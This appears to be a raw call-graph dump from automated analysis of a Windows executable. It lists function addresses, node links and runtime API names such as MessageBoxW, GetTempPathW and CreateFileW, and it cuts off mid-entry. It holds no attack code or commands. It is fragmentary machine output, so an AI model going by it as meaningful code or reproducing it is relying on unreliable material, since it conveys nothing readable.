7ff735c53100 16283->16344 16285->16275 16288 7ff735c51feb 16287->16288 16289 7ff735c51f8e 16287->16289 16291 7ff735c5205b 16288->16291 16292 7ff735c51fef 16288->16292 16290 7ff735c5204e 16289->16290 16302 7ff735c51f94 16289->16302 16372 7ff735c50568 16290->16372 16379 7ff735c52864 16291->16379 16292->16290 16295 7ff735c52047 16292->16295 16296 7ff735c51ff7 16292->16296 16294 7ff735c51fc6 16311 7ff735c52064 16294->16311 16350 7ff735c52d10 16294->16350 16368 7ff735c52e98 16295->16368 16299 7ff735c51ffb 16296->16299 16300 7ff735c52027 16296->16300 16299->16290 16308 7ff735c51fe1 16299->16308 16310 7ff735c51fd5 16299->16310 16361 7ff735c50194 16300->16361 16302->16291 16302->16294 16305 7ff735c51fba 16302->16305 16302->16308 16302->16310 16302->16311 16304 7ff735c4a410 _wfindfirst32i64 8 API calls 16306 7ff735c522f6 16304->16306 16305->16291 16305->16294 16305->16310 16306->16283 16308->16311 16354 7ff735c5093c 16308->16354 16310->16311 16389 7ff735c5d090 16310->16389 16311->16304 16313 7ff735c51c39 16312->16313 16314 7ff735c51c23 16312->16314 16315 7ff735c51c77 16313->16315 16316 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16313->16316 16314->16315 16317 7ff735c51feb 16314->16317 16318 7ff735c51f8e 16314->16318 16315->16283 16316->16315 16321 7ff735c5205b 16317->16321 16322 7ff735c51fef 16317->16322 16319 7ff735c5204e 16318->16319 16320 7ff735c51f94 16318->16320 16326 7ff735c50568 38 API calls 16319->16326 16320->16321 16334 7ff735c51fe1 16320->16334 16335 7ff735c51fba 16320->16335 16337 7ff735c51fc6 16320->16337 16339 7ff735c51fd5 16320->16339 16340 7ff735c52064 16320->16340 16323 7ff735c52864 47 API calls 16321->16323 16322->16319 16324 7ff735c52047 16322->16324 16325 7ff735c51ff7 16322->16325 16323->16339 16327 7ff735c52e98 37 API calls 16324->16327 16328 7ff735c52027 16325->16328 16331 7ff735c51ffb 16325->16331 16326->16339 16327->16339 16332 7ff735c50194 38 API calls 16328->16332 16329 7ff735c52d10 47 API calls 16329->16339 16330 7ff735c4a410 _wfindfirst32i64 8 API calls 16333 7ff735c522f6 16330->16333 16331->16319 16331->16334 16331->16339 16332->16339 16333->16283 16336 7ff735c5093c 38 API calls 16334->16336 16334->16340 16335->16321 16335->16337 16335->16339 16336->16339 16337->16329 16337->16340 16338 7ff735c5d090 47 API calls 16338->16339 16339->16338 16339->16340 16340->16330 16532 7ff735c4f78c 16341->16532 16345 7ff735c53117 16344->16345 16549 7ff735c5c1d4 16345->16549 16351 7ff735c52d24 16350->16351 16353 7ff735c52d83 16350->16353 16352 7ff735c5d090 47 API calls 16351->16352 16351->16353 16352->16353 16353->16310 16355 7ff735c50962 16354->16355 16356 7ff735c5098c 16355->16356 16358 7ff735c50a43 16355->16358 16360 7ff735c509c8 16356->16360 16399 7ff735c4f5f8 16356->16399 16359 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16358->16359 16359->16360 16360->16310 16362 7ff735c501ba 16361->16362 16363 7ff735c501e4 16362->16363 16365 7ff735c5029b 16362->16365 16364 7ff735c4f5f8 12 API calls 16363->16364 16367 7ff735c50220 16363->16367 16364->16367 16366 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16365->16366 16366->16367 16367->16310 16371 7ff735c52eb7 16368->16371 16369 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16370 7ff735c52ee8 16369->16370 16370->16310 16371->16369 16371->16370 16373 7ff735c5058e 16372->16373 16374 7ff735c505b8 16373->16374 16376 7ff735c5066f 16373->16376 16375 7ff735c4f5f8 12 API calls 16374->16375 16378 7ff735c505f4 16374->16378 16375->16378 16377 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16376->16377 16377->16378 16378->16310 16380 7ff735c52886 16379->16380 16381 7ff735c4f5f8 12 API calls 16380->16381 16382 7ff735c528d0 16381->16382 16407 7ff735c5cda8 16382->16407 16385 7ff735c529bc 16387 7ff735c53100 45 API calls 16385->16387 16388 7ff735c52a45 16385->16388 16386 7ff735c53100 45 API calls 16386->16385 16387->16388 16388->16310 16391 7ff735c5d0b8 16389->16391 16390 7ff735c5d0fd 16394 7ff735c5d0e6 __scrt_get_show_window_mode 16390->16394 16397 7ff735c5d0bd __scrt_get_show_window_mode 16390->16397 16529 7ff735c5e704 16390->16529 16391->16390 16392 7ff735c53100 45 API calls 16391->16392 16391->16394 16391->16397 16392->16390 16393 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16393->16397 16394->16393 16394->16397 16397->16310 16400 7ff735c4f62f 16399->16400 16405 7ff735c4f61e 16399->16405 16401 7ff735c5c140 _fread_nolock 12 API calls 16400->16401 16400->16405 16402 7ff735c4f65c 16401->16402 16403 7ff735c59468 __free_lconv_num 11 API calls 16402->16403 16406 7ff735c4f670 16402->16406 16403->16406 16404 7ff735c59468 __free_lconv_num 11 API calls 16404->16405 16405->16360 16406->16404 16408 7ff735c5cdf8 16407->16408 16409 7ff735c5cdc5 16407->16409 16408->16409 16412 7ff735c5ce2a 16408->16412 16410 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16409->16410 16411 7ff735c5299a 16410->16411 16411->16385 16411->16386 16418 7ff735c5cf3d 16412->16418 16422 7ff735c5ce72 16412->16422 16413 7ff735c5d02f 16462 7ff735c5c278 16413->16462 16415 7ff735c5cff5 16455 7ff735c5c62c 16415->16455 16417 7ff735c5cfc4 16448 7ff735c5c90c 16417->16448 16418->16413 16418->16415 16418->16417 16419 7ff735c5cf87 16418->16419 16421 7ff735c5cf7d 16418->16421 16438 7ff735c5cb3c 16419->16438 16421->16415 16424 7ff735c5cf82 16421->16424 16422->16411 16429 7ff735c5880c 16422->16429 16424->16417 16424->16419 16427 7ff735c59420 _wfindfirst32i64 17 API calls 16428 7ff735c5d08c 16427->16428 16430 7ff735c58819 16429->16430 16431 7ff735c58823 16429->16431 16430->16431 16436 7ff735c5883e 16430->16436 16432 7ff735c53b18 _get_daylight 11 API calls 16431->16432 16433 7ff735c5882a 16432->16433 16434 7ff735c59400 _invalid_parameter_noinfo 37 API calls 16433->16434 16435 7ff735c58836 16434->16435 16435->16411 16435->16427 16436->16435 16437 7ff735c53b18 _get_daylight 11 API calls 16436->16437 16437->16433 16471 7ff735c623ec 16438->16471 16442 7ff735c5cbe8 16442->16411 16443 7ff735c5cbe4 16443->16442 16444 7ff735c5cc39 16443->16444 16446 7ff735c5cc04 16443->16446 16518 7ff735c5c728 16444->16518 16514 7ff735c5c9e4 16446->16514 16449 7ff735c623ec 38 API calls 16448->16449 16450 7ff735c5c956 16449->16450 16451 7ff735c61ddc 37 API calls 16450->16451 16452 7ff735c5c9a6 16451->16452 16453 7ff735c5c9aa 16452->16453 16454 7ff735c5c9e4 45 API calls 16452->16454 16453->16411 16454->16453 16456 7ff735c623ec 38 API calls 16455->16456 16457 7ff735c5c677 16456->16457 16458 7ff735c61ddc 37 API calls 16457->16458 16459 7ff735c5c6cf 16458->16459 16460 7ff735c5c6d3 16459->16460 16461 7ff735c5c728 45 API calls 16459->16461 16460->16411 16461->16460 16463 7ff735c5c2bd 16462->16463 16464 7ff735c5c2f0 16462->16464 16466 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16463->16466 16465 7ff735c5c30b 16464->16465 16468 7ff735c5c38f 16464->16468 16467 7ff735c5c62c 46 API calls 16465->16467 16470 7ff735c5c2e9 __scrt_get_show_window_mode 16466->16470 16467->16470 16469 7ff735c53100 45 API calls 16468->16469 16468->16470 16469->16470 16470->16411 16472 7ff735c62440 fegetenv 16471->16472 16473 7ff735c66340 37 API calls 16472->16473 16477 7ff735c62494 16473->16477 16474 7ff735c624c3 16478 7ff735c5880c __std_exception_copy 37 API calls 16474->16478 16475 7ff735c62583 16476 7ff735c66530 20 API calls 16475->16476 16493 7ff735c625ee __scrt_get_show_window_mode 16476->16493 16477->16475 16479 7ff735c624b0 16477->16479 16480 7ff735c62560 16477->16480 16481 7ff735c62541 16478->16481 16479->16474 16479->16475 16483 7ff735c5880c __std_exception_copy 37 API calls 16480->16483 16482 7ff735c63616 16481->16482 16486 7ff735c62549 16481->16486 16484 7ff735c59420 _wfindfirst32i64 17 API calls 16482->16484 16483->16481 16485 7ff735c6362b 16484->16485 16487 7ff735c4a410 _wfindfirst32i64 8 API calls 16486->16487 16488 7ff735c5cb89 16487->16488 16510 7ff735c61ddc 16488->16510 16489 7ff735c62997 __scrt_get_show_window_mode 16490 7ff735c62cd8 16492 7ff735c61f60 37 API calls 16490->16492 16491 7ff735c6262f memcpy_s 16505 7ff735c62f71 memcpy_s __scrt_get_show_window_mode 16491->16505 16506 7ff735c62a8b memcpy_s __scrt_get_show_window_mode 16491->16506 16498 7ff735c633eb 16492->16498 16493->16489 16493->16491 16496 7ff735c53b18 _get_daylight 11 API calls 16493->16496 16494 7ff735c62c83 16494->16490 16495 7ff735c6362c memcpy_s 37 API calls 16494->16495 16495->16490 16497 7ff735c62a68 16496->16497 16499 7ff735c59400 _invalid_parameter_noinfo 37 API calls 16497->16499 16500 7ff735c6362c memcpy_s 37 API calls 16498->16500 16509 7ff735c63446 16498->16509 16499->16491 16500->16509 16501 7ff735c53b18 11 API calls _get_daylight 16501->16506 16502 7ff735c53b18 11 API calls _get_daylight 16502->16505 16503 7ff735c61f60 37 API calls 16503->16509 16504 7ff735c59400 37 API calls _invalid_parameter_noinfo 16504->16505 16505->16490 16505->16494 16505->16502 16505->16504 16506->16494 16506->16501 16507 7ff735c59400 37 API calls _invalid_parameter_noinfo 16506->16507 16507->16506 16508 7ff735c6362c memcpy_s 37 API calls 16508->16509 16509->16486 16509->16503 16509->16508 16511 7ff735c61e04 16510->16511 16512 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16511->16512 16513 7ff735c61e32 memcpy_s 16511->16513 16512->16513 16513->16443 16515 7ff735c5ca10 memcpy_s 16514->16515 16516 7ff735c53100 45 API calls 16515->16516 16517 7ff735c5caca memcpy_s __scrt_get_show_window_mode 16515->16517 16516->16517 16517->16442 16519 7ff735c5c763 16518->16519 16522 7ff735c5c7b0 memcpy_s 16518->16522 16520 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16519->16520 16521 7ff735c5c78f 16520->16521 16521->16442 16523 7ff735c5c81b 16522->16523 16525 7ff735c53100 45 API calls 16522->16525 16524 7ff735c5880c __std_exception_copy 37 API calls 16523->16524 16526 7ff735c5c85d memcpy_s 16524->16526 16525->16523 16527 7ff735c59420 _wfindfirst32i64 17 API calls 16526->16527 16528 7ff735c5c908 16527->16528 16530 7ff735c5e727 WideCharToMultiByte 16529->16530 16533 7ff735c4f7cc 16532->16533 16534 7ff735c4f7ba 16532->16534 16536 7ff735c4f7d9 16533->16536 16540 7ff735c4f816 16533->16540 16535 7ff735c53b18 _get_daylight 11 API calls 16534->16535 16537 7ff735c4f7bf 16535->16537 16539 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16536->16539 16538 7ff735c59400 _invalid_parameter_noinfo 37 API calls 16537->16538 16548 7ff735c4f7ca 16538->16548 16539->16548 16541 7ff735c4f8c2 16540->16541 16542 7ff735c53b18 _get_daylight 11 API calls 16540->16542 16544 7ff735c53b18 _get_daylight 11 API calls 16541->16544 16541->16548 16543 7ff735c4f8b7 16542->16543 16545 7ff735c59400 _invalid_parameter_noinfo 37 API calls 16543->16545 16546 7ff735c4f96f 16544->16546 16545->16541 16547 7ff735c59400 _invalid_parameter_noinfo 37 API calls 16546->16547 16547->16548 16548->16283 16550 7ff735c5c1ed 16549->16550 16551 7ff735c5313f 16549->16551 16550->16551 16557 7ff735c6197c 16550->16557 16553 7ff735c5c240 16551->16553 16554 7ff735c5c259 16553->16554 16555 7ff735c5314f 16553->16555 16554->16555 16570 7ff735c60d04 16554->16570 16555->16283 16558 7ff735c59c60 __CxxCallCatchBlock 45 API calls 16557->16558 16559 7ff735c6198b 16558->16559 16560 7ff735c619d6 16559->16560 16569 7ff735c5eda0 EnterCriticalSection 16559->16569 16560->16551 16571 7ff735c59c60 __CxxCallCatchBlock 45 API calls 16570->16571 16572 7ff735c60d0d 16571->16572 16580 7ff735c539c0 EnterCriticalSection 16573->16580 16582 7ff735c4259c 16581->16582 16583 7ff735c532c4 49 API calls 16582->16583 16584 7ff735c425ef 16583->16584 16585 7ff735c53b18 _get_daylight 11 API calls 16584->16585 16586 7ff735c425f4 16585->16586 16600 7ff735c53b38 16586->16600 16589 7ff735c41be0 49 API calls 16590 7ff735c42623 __scrt_get_show_window_mode 16589->16590 16591 7ff735c47250 57 API calls 16590->16591 16592 7ff735c42650 16591->16592 16593 7ff735c4268f MessageBoxA 16592->16593 16594 7ff735c42655 16592->16594 16596 7ff735c426a9 16593->16596 16595 7ff735c47250 57 API calls 16594->16595 16597 7ff735c4266f MessageBoxW 16595->16597 16598 7ff735c4a410 _wfindfirst32i64 8 API calls 16596->16598 16597->16596 16599 7ff735c426b9 16598->16599 16599->15924 16601 7ff735c59dd8 _get_daylight 11 API calls 16600->16601 16602 7ff735c53b4f 16601->16602 16603 7ff735c425fb 16602->16603 16604 7ff735c53b8f 16602->16604 16605 7ff735c5d3d0 _get_daylight 11 API calls 16602->16605 16603->16589 16604->16603 16612 7ff735c5da98 16604->16612 16606 7ff735c53b84 16605->16606 16607 7ff735c59468 __free_lconv_num 11 API calls 16606->16607 16607->16604 16610 7ff735c59420 _wfindfirst32i64 17 API calls 16611 7ff735c53bd4 16610->16611 16617 7ff735c5dab5 16612->16617 16613 7ff735c5daba 16614 7ff735c53bb5 16613->16614 16615 7ff735c53b18 _get_daylight 11 API calls 16613->16615 16614->16603 16614->16610 16616 7ff735c5dac4 16615->16616 16618 7ff735c59400 _invalid_parameter_noinfo 37 API calls 16616->16618 16617->16613 16617->16614 16619 7ff735c5db04 16617->16619 16618->16614 16619->16614 16620 7ff735c53b18 _get_daylight 11 API calls 16619->16620 16620->16616 16622 7ff735c473f2 WideCharToMultiByte 16621->16622 16623 7ff735c47384 WideCharToMultiByte 16621->16623 16624 7ff735c4741f 16622->16624 16631 7ff735c43a55 16622->16631 16625 7ff735c473ae 16623->16625 16626 7ff735c473c5 16623->16626 16627 7ff735c426d0 57 API calls 16624->16627 16628 7ff735c426d0 57 API calls 16625->16628 16626->16622 16629 7ff735c473db 16626->16629 16627->16631 16628->16631 16630 7ff735c426d0 57 API calls 16629->16630 16630->16631 16631->15932 16631->15934 16633 7ff735c464be 16632->16633 16634 7ff735c58783 16632->16634 16633->15953 16634->16633 16635 7ff735c5880c __std_exception_copy 37 API calls 16634->16635 16636 7ff735c587b0 16635->16636 16636->16633 16637 7ff735c59420 _wfindfirst32i64 17 API calls 16636->16637 16638 7ff735c587e0 16637->16638 16640 7ff735c417c3 16639->16640 16642 7ff735c417d3 16639->16642 16680 7ff735c43b00 16640->16680 16645 7ff735c418c0 __std_exception_copy 16642->16645 16675 7ff735c418ae __std_exception_copy 16642->16675 16690 7ff735c4ebd0 16642->16690 16644 7ff735c4180c 16644->16645 16694 7ff735c4f154 16644->16694 16646 7ff735c4ebd0 73 API calls 16645->16646 16645->16675 16648 7ff735c418e1 16646->16648 16649 7ff735c41902 16648->16649 16650 7ff735c418e5 16648->16650 16652 7ff735c4e8b8 _fread_nolock 53 API calls 16649->16652 16651 7ff735c42580 59 API calls 16650->16651 16651->16675 16653 7ff735c41917 16652->16653 16655 7ff735c4191d 16653->16655 16656 7ff735c4ebd0 73 API calls 16653->16656 16654 7ff735c4ebd0 73 API calls 16658 7ff735c4181c 16654->16658 16659 7ff735c42580 59 API calls 16655->16659 16657 7ff735c41986 16656->16657 16661 7ff735c41998 16657->16661 16662 7ff735c419b5 16657->16662 16658->16645 16658->16654 16658->16675 16698 7ff735c4e8b8 16658->16698 16659->16675 16663 7ff735c42580 59 API calls 16661->16663 16664 7ff735c4e8b8 _fread_nolock 53 API calls 16662->16664 16663->16675 16665 7ff735c419ca 16664->16665 16665->16655 16666 7ff735c419dc 16665->16666 16701 7ff735c4e62c 16666->16701 16669 7ff735c41a07 16672 7ff735c41a44 16669->16672 16673 7ff735c42820 59 API calls 16669->16673 16670 7ff735c419f4 16671 7ff735c42820 59 API calls 16670->16671 16671->16675 16674 7ff735c4e568 74 API calls 16672->16674 16672->16675 16673->16672 16674->16675 16675->15968 16677 7ff735c4e598 16676->16677 16983 7ff735c4e348 16677->16983 16679 7ff735c4e5b1 16679->15967 16681 7ff735c43b0c 16680->16681 16682 7ff735c47250 57 API calls 16681->16682 16683 7ff735c43b37 16682->16683 16684 7ff735c47250 57 API calls 16683->16684 16685 7ff735c43b4a 16684->16685 16707 7ff735c54ba8 16685->16707 16688 7ff735c4a410 _wfindfirst32i64 8 API calls 16689 7ff735c43b69 16688->16689 16689->16642 16691 7ff735c4ec00 16690->16691 16946 7ff735c4e980 16691->16946 16693 7ff735c4ec19 16693->16644 16695 7ff735c4f184 16694->16695 16958 7ff735c4ec68 16695->16958 16697 7ff735c4f19d 16697->16658 16969 7ff735c4e8d8 16698->16969 16702 7ff735c4e635 16701->16702 16706 7ff735c419f0 16701->16706 16703 7ff735c53b18 _get_daylight 11 API calls 16702->16703 16704 7ff735c4e63a 16703->16704 16705 7ff735c59400 _invalid_parameter_noinfo 37 API calls 16704->16705 16705->16706 16706->16669 16706->16670 16708 7ff735c54adc 16707->16708 16709 7ff735c54b02 16708->16709 16711 7ff735c54b35 16708->16711 16710 7ff735c53b18 _get_daylight 11 API calls 16709->16710 16712 7ff735c54b07 16710->16712 16713 7ff735c54b3b 16711->16713 16714 7ff735c54b48 16711->16714 16715 7ff735c59400 _invalid_parameter_noinfo 37 API calls 16712->16715 16716 7ff735c53b18 _get_daylight 11 API calls 16713->16716 16726 7ff735c59748 16714->16726 16725 7ff735c43b59 16715->16725 16716->16725 16725->16688 16739 7ff735c5eda0 EnterCriticalSection 16726->16739 16947 7ff735c4e9ea 16946->16947 16948 7ff735c4e9aa 16946->16948 16947->16948 16950 7ff735c4e9ef 16947->16950 16949 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16948->16949 16951 7ff735c4e9d1 16949->16951 16957 7ff735c539c0 EnterCriticalSection 16950->16957 16951->16693 16959 7ff735c4ec83 16958->16959 16960 7ff735c4ecb2 16958->16960 16961 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16959->16961 16968 7ff735c539c0 EnterCriticalSection 16960->16968 16963 7ff735c4eca3 16961->16963 16963->16697 16970 7ff735c4e902 16969->16970 16971 7ff735c4e8d0 16969->16971 16970->16971 16972 7ff735c4e94e 16970->16972 16973 7ff735c4e911 __scrt_get_show_window_mode 16970->16973 16971->16658 16982 7ff735c539c0 EnterCriticalSection 16972->16982 16975 7ff735c53b18 _get_daylight 11 API calls 16973->16975 16977 7ff735c4e926 16975->16977 16980 7ff735c59400 _invalid_parameter_noinfo 37 API calls 16977->16980 16980->16971 16984 7ff735c4e363 16983->16984 16985 7ff735c4e391 16983->16985 16986 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16984->16986 16988 7ff735c4e383 16985->16988 16993 7ff735c539c0 EnterCriticalSection 16985->16993 16986->16988 16988->16679 17086 7ff735c461d0 16994->17086 16996 7ff735c41454 16997 7ff735c41459 16996->16997 17095 7ff735c464f0 16996->17095 16997->15995 17000 7ff735c414a7 17003 7ff735c414e0 17000->17003 17005 7ff735c43b00 116 API calls 17000->17005 17001 7ff735c41487 17002 7ff735c42580 59 API calls 17001->17002 17022 7ff735c4149d 17002->17022 17004 7ff735c4ebd0 73 API calls 17003->17004 17006 7ff735c414f2 17004->17006 17007 7ff735c414bf 17005->17007 17009 7ff735c41516 17006->17009 17010 7ff735c414f6 17006->17010 17007->17003 17008 7ff735c414c7 17007->17008 17011 7ff735c42820 59 API calls 17008->17011 17013 7ff735c4151c 17009->17013 17014 7ff735c41534 17009->17014 17012 7ff735c42580 59 API calls 17010->17012 17021 7ff735c414d6 __std_exception_copy 17011->17021 17012->17021 17115 7ff735c41050 17013->17115 17016 7ff735c41556 17014->17016 17027 7ff735c41575 17014->17027 17018 7ff735c42580 59 API calls 17016->17018 17017 7ff735c41624 17020 7ff735c4e568 74 API calls 17017->17020 17018->17021 17019 7ff735c4e568 74 API calls 17019->17017 17020->17022 17021->17017 17021->17019 17022->15995 17023 7ff735c4e8b8 _fread_nolock 53 API calls 17023->17027 17024 7ff735c415d5 17026 7ff735c42580 59 API calls 17024->17026 17026->17021 17027->17021 17027->17023 17027->17024 17133 7ff735c4f554 17027->17133 17029 7ff735c42a56 17028->17029 17030 7ff735c41be0 49 API calls 17029->17030 17032 7ff735c42a8b 17030->17032 17031 7ff735c42e79 17032->17031 17033 7ff735c43970 49 API calls 17032->17033 17034 7ff735c42b07 17033->17034 17681 7ff735c42e90 17034->17681 17037 7ff735c42b97 17039 7ff735c461d0 98 API calls 17037->17039 17038 7ff735c42e90 75 API calls 17040 7ff735c42b93 17038->17040 17041 7ff735c42b9f 17039->17041 17040->17037 17042 7ff735c42c05 17040->17042 17043 7ff735c42bbc 17041->17043 17689 7ff735c460b0 17041->17689 17044 7ff735c42e90 75 API calls 17042->17044 17047 7ff735c42820 59 API calls 17043->17047 17049 7ff735c42bd6 17043->17049 17046 7ff735c42c2e 17044->17046 17048 7ff735c42c88 17046->17048 17050 7ff735c42e90 75 API calls 17046->17050 17047->17049 17048->17043 17051 7ff735c461d0 98 API calls 17048->17051 17052 7ff735c4a410 _wfindfirst32i64 8 API calls 17049->17052 17053 7ff735c42c5b 17050->17053 17056 7ff735c42c98 17051->17056 17054 7ff735c42bfa 17052->17054 17053->17048 17055 7ff735c42e90 75 API calls 17053->17055 17054->15995 17055->17048 17056->17043 17057 7ff735c41ba0 59 API calls 17056->17057 17059 7ff735c42db6 17056->17059 17059->17043 17083 7ff735c41785 17082->17083 17085 7ff735c41791 17082->17085 17084 7ff735c42820 59 API calls 17083->17084 17084->17085 17085->15995 17087 7ff735c46218 17086->17087 17088 7ff735c461e2 17086->17088 17087->16996 17137 7ff735c416d0 17088->17137 17096 7ff735c46500 17095->17096 17097 7ff735c41be0 49 API calls 17096->17097 17098 7ff735c46531 17097->17098 17099 7ff735c41be0 49 API calls 17098->17099 17110 7ff735c466b9 17098->17110 17102 7ff735c46558 17099->17102 17100 7ff735c4a410 _wfindfirst32i64 8 API calls 17101 7ff735c4147f 17100->17101 17101->17000 17101->17001 17102->17110 17631 7ff735c547c8 17102->17631 17104 7ff735c46669 17105 7ff735c47250 57 API calls 17104->17105 17107 7ff735c46681 17105->17107 17106 7ff735c466a8 17109 7ff735c43b00 116 API calls 17106->17109 17107->17106 17640 7ff735c42930 17107->17640 17109->17110 17110->17100 17111 7ff735c4658d 17111->17104 17111->17110 17112 7ff735c547c8 49 API calls 17111->17112 17113 7ff735c47250 57 API calls 17111->17113 17114 7ff735c470c0 58 API calls 17111->17114 17112->17111 17113->17111 17114->17111 17116 7ff735c410a6 17115->17116 17117 7ff735c410ad 17116->17117 17118 7ff735c410d3 17116->17118 17119 7ff735c42820 59 API calls 17117->17119 17121 7ff735c41109 17118->17121 17122 7ff735c410ed 17118->17122 17120 7ff735c410c0 17119->17120 17120->17021 17124 7ff735c4111b 17121->17124 17132 7ff735c41137 memcpy_s 17121->17132 17123 7ff735c42580 59 API calls 17122->17123 17134 7ff735c4f584 17133->17134 17666 7ff735c4f2b8 17134->17666 17139 7ff735c416f5 17137->17139 17138 7ff735c41732 17141 7ff735c46230 17138->17141 17139->17138 17140 7ff735c42820 59 API calls 17139->17140 17140->17138 17142 7ff735c46248 17141->17142 17143 7ff735c46268 17142->17143 17144 7ff735c462bb 17142->17144 17146 7ff735c46440 61 API calls 17143->17146 17145 7ff735c462c0 GetTempPathW 17144->17145 17147 7ff735c462d5 17145->17147 17148 7ff735c46274 17146->17148 17181 7ff735c42520 17147->17181 17205 7ff735c45f60 17148->17205 17153 7ff735c4a410 _wfindfirst32i64 8 API calls 17158 7ff735c462ee __std_exception_copy 17160 7ff735c46396 17158->17160 17164 7ff735c46321 17158->17164 17185 7ff735c56f80 17158->17185 17188 7ff735c470c0 17158->17188 17180 7ff735c4635a __std_exception_copy 17164->17180 17180->17153 17182 7ff735c42545 17181->17182 17236 7ff735c53518 17182->17236 17206 7ff735c45f6c 17205->17206 17207 7ff735c47250 57 API calls 17206->17207 17208 7ff735c45f8e 17207->17208 17209 7ff735c45fa9 ExpandEnvironmentStringsW 17208->17209 17210 7ff735c45f96 17208->17210 17212 7ff735c45fd2 __std_exception_copy 17209->17212 17211 7ff735c42820 59 API calls 17210->17211 17218 7ff735c45fa2 17211->17218 17213 7ff735c45fe9 17212->17213 17214 7ff735c45fd6 17212->17214 17531 7ff735c54a28 17213->17531 17217 7ff735c42820 59 API calls 17214->17217 17216 7ff735c4a410 _wfindfirst32i64 8 API calls 17220 7ff735c460a2 17216->17220 17217->17218 17218->17216 17220->17180 17226 7ff735c55cf0 17220->17226 17227 7ff735c55cfd 17226->17227 17228 7ff735c55d10 17226->17228 17239 7ff735c53572 17236->17239 17237 7ff735c53597 17238 7ff735c59330 _invalid_parameter_noinfo 37 API calls 17237->17238 17253 7ff735c535c1 17238->17253 17239->17237 17240 7ff735c535d3 17239->17240 17254 7ff735c51954 17240->17254 17243 7ff735c4a410 _wfindfirst32i64 8 API calls 17245 7ff735c42564 17243->17245 17244 7ff735c59468 __free_lconv_num 11 API calls 17244->17253 17245->17158 17246 7ff735c536b4 17246->17244 17247 7ff735c53689 17250 7ff735c59468 __free_lconv_num 11 API calls 17247->17250 17248 7ff735c536da 17248->17246 17249 7ff735c536e4 17248->17249 17250->17253 17251 7ff735c53680 17251->17246 17251->17247 17253->17243 17255 7ff735c51992 17254->17255 17256 7ff735c51982 17254->17256 17257 7ff735c51998 17255->17257 17262 7ff735c519c8 17255->17262 17258 7ff735c59330 _invalid_parameter_noinfo 37 API calls 17256->17258 17259 7ff735c59330 _invalid_parameter_noinfo 37 API calls 17257->17259 17260 7ff735c519c0 17258->17260 17259->17260 17260->17246 17260->17247 17260->17248 17260->17251 17262->17256 17262->17260 17265 7ff735c52314 17262->17265 17296 7ff735c51d9c 17262->17296 17331 7ff735c51540 17262->17331 17266 7ff735c52358 17265->17266 17267 7ff735c523ca 17265->17267 17268 7ff735c5243b 17266->17268 17280 7ff735c5235e 17266->17280 17269 7ff735c52448 17267->17269 17270 7ff735c523d0 17267->17270 17270->17268 17280->17269 17281 7ff735c523fd 17280->17281 17297 7ff735c51daa 17296->17297 17298 7ff735c51dc0 17296->17298 17299 7ff735c52358 17297->17299 17300 7ff735c523ca 17297->17300 17312 7ff735c51e00 17297->17312 17301 7ff735c59330 _invalid_parameter_noinfo 37 API calls 17298->17301 17298->17312 17301->17312 17312->17262 17387 7ff735c4fa3c 17331->17387 17388 7ff735c4fa83 17387->17388 17389 7ff735c4fa71 17387->17389 17532 7ff735c54a44 17531->17532 17533 7ff735c54ab2 17531->17533 17532->17533 17535 7ff735c54a49 17532->17535 17568 7ff735c5e6dc 17533->17568 17536 7ff735c54a7e 17535->17536 17537 7ff735c54a61 17535->17537 17571 7ff735c5e4e0 17568->17571 17632 7ff735c59c60 __CxxCallCatchBlock 45 API calls 17631->17632 17634 7ff735c547dd 17632->17634 17633 7ff735c5e4d9 17653 7ff735c4a7a4 17633->17653 17634->17633 17638 7ff735c5e3f2 17634->17638 17637 7ff735c4a410 _wfindfirst32i64 8 API calls 17639 7ff735c5e4d1 17637->17639 17638->17637 17639->17111 17641 7ff735c42950 17640->17641 17656 7ff735c4a7b8 IsProcessorFeaturePresent 17653->17656 17657 7ff735c4a7cf 17656->17657 17662 7ff735c4a854 RtlCaptureContext RtlLookupFunctionEntry 17657->17662 17663 7ff735c4a884 RtlVirtualUnwind 17662->17663 17664 7ff735c4a7e3 17662->17664 17663->17664 17665 7ff735c4a69c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17664->17665 17667 7ff735c4f305 17666->17667 17668 7ff735c4f2d8 17666->17668 17668->17667 17682 7ff735c42ec4 17681->17682 17683 7ff735c532c4 49 API calls 17682->17683 17684 7ff735c42eea 17683->17684 17685 7ff735c42efb 17684->17685 17713 7ff735c544e0 17684->17713 17687 7ff735c4a410 _wfindfirst32i64 8 API calls 17685->17687 17688 7ff735c42b46 17687->17688 17688->17037 17688->17038 17690 7ff735c460be 17689->17690 17691 7ff735c43b00 116 API calls 17690->17691 17692 7ff735c460e5 17691->17692 17693 7ff735c464f0 132 API calls 17692->17693 17694 7ff735c460f3 17693->17694 17714 7ff735c544fd 17713->17714 17715 7ff735c54509 17713->17715 17730 7ff735c53d54 17714->17730 17717 7ff735c540f0 45 API calls 17715->17717 17719 7ff735c54531 17717->17719 17718 7ff735c54502 17718->17685 17721 7ff735c54541 17719->17721 17755 7ff735c5d660 17719->17755 17758 7ff735c53bd8 17721->17758 17724 7ff735c5459d 17724->17718 17727 7ff735c59468 __free_lconv_num 11 API calls 17724->17727 17725 7ff735c545b1 17726 7ff735c53d54 69 API calls 17725->17726 17728 7ff735c545bd 17726->17728 17727->17718 17728->17718 17729 7ff735c59468 __free_lconv_num 11 API calls 17728->17729 17729->17718 17731 7ff735c53d8b 17730->17731 17732 7ff735c53d6e 17730->17732 17731->17732 17733 7ff735c53d9e CreateFileW 17731->17733 17734 7ff735c53af8 _fread_nolock 11 API calls 17732->17734 17735 7ff735c53e08 17733->17735 17736 7ff735c53dd2 17733->17736 17737 7ff735c53d73 17734->17737 17806 7ff735c543d0 17735->17806 17780 7ff735c53ea8 GetFileType 17736->17780 17740 7ff735c53b18 _get_daylight 11 API calls 17737->17740 17743 7ff735c53d7b 17740->17743 17744 7ff735c59400 _invalid_parameter_noinfo 37 API calls 17743->17744 17750 